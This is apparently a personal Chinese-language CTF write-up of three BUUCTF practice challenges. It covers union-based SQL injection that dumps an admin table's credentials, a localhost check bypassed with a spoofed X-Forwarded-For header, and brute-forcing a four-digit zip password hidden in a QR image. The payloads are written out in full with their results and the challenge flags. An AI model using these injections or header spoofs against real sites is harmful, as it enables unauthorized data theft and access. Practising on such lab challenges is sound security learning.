BUU 22.1.11
|´・ω・)ノ
BUU SQL COURSE 1
找到了第一个地方
http://f4540384-ea58-4dea-83cf-d9c11a2bbfdb.node4.buuoj.cn:81/backend/content_detail.php?id=1
对于登录的地方,找了找好像没有什么有用的东西,就抓到一个POST
而且这个题也说是sql注入,那就考虑一下sql
然后从这里就卡住了
开始百度了。
content_detail.php?id=2 and 1=1 这样有返回的json
content_detail.php?id=2 and 1=2 这样没有返回的json
那样似乎可以说明这个sql被执行了。
?id=-1 union select 1,group_concat(distinct table_schema) from information_schema.columns
这样,联合查询,可以吧所有的库查出来。
{"title":"1","content":"information_schema,ctftraining,mysql,performance_schema,news"}
然后,对news库进行查询。
?id=-1 union select 1,group_concat(distinct table_name) from information_schema.columns where table_schema = 'news'
{"title":"1","content":"admin,contents"}
然后对admin表进行查询
?id=-1 union select 1,group_concat(distinct column_name) from information_schema.columns where table_name = 'admin'
得到:
{"title":"1","content":"id,username,password"}
然后对admin的库进行查询。
?id=-1 union select 1,group_concat(username,":",password) from admin
/backend/content_detail.php?id=-1%20union%20select%201,group_concat(username,%22:%22,password)%20from%20admin
{"title":"1","content":"admin:2346398f940ee03a8ae6a4e84dba0a9f"}
下一步
登录admin账号,密码:2346398f940ee03a8ae6a4e84dba0a9f
得到:flag{61ab7b14-b23d-498f-a804-3c98775f17aa}
备注:
select 1 from table
select anycol from table
select * from table
都是没有作用上的差别的。
但从效率上来说,1>anycol>*
BUU BURP COURSE 1
打开后显示
只能本地访问。那么用burp直接伪造ip
X-Forwarded-For: 127.0.0.1
HTTP_X_FORWARD_FOR: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1得到:
<form action="" method="post">
用户名:<input type="text" name="username" value="admin"/><br>
密码:<input type="password" name="password" value="wwoj2wio2jw93ey43eiuwdjnewkndjlwe"/><br>
<input type="submit" value="登录"/>
</form>然后点击登录得到
登录成功!flag{9cd39cf8-dab7-4965-9ace-1443a35c958a}记得每次收发包都要伪造一下ip
二维码
扫描后显示secret is here
考虑可能在文件内
我傻了
改成zip直接打开了
里面有个4number.txt
那样考虑一下压缩包爆破?
↓随便下了个压缩包爆破
爆破开始
[+]QR_code.png.zip 解压密码是: 7639
[-] 耗时:0.0009925365447998047秒
[-] 累计尝试7639得到flagCTF{vjpw_wnoei}
提交的时候要flag{vjpw_wnoei}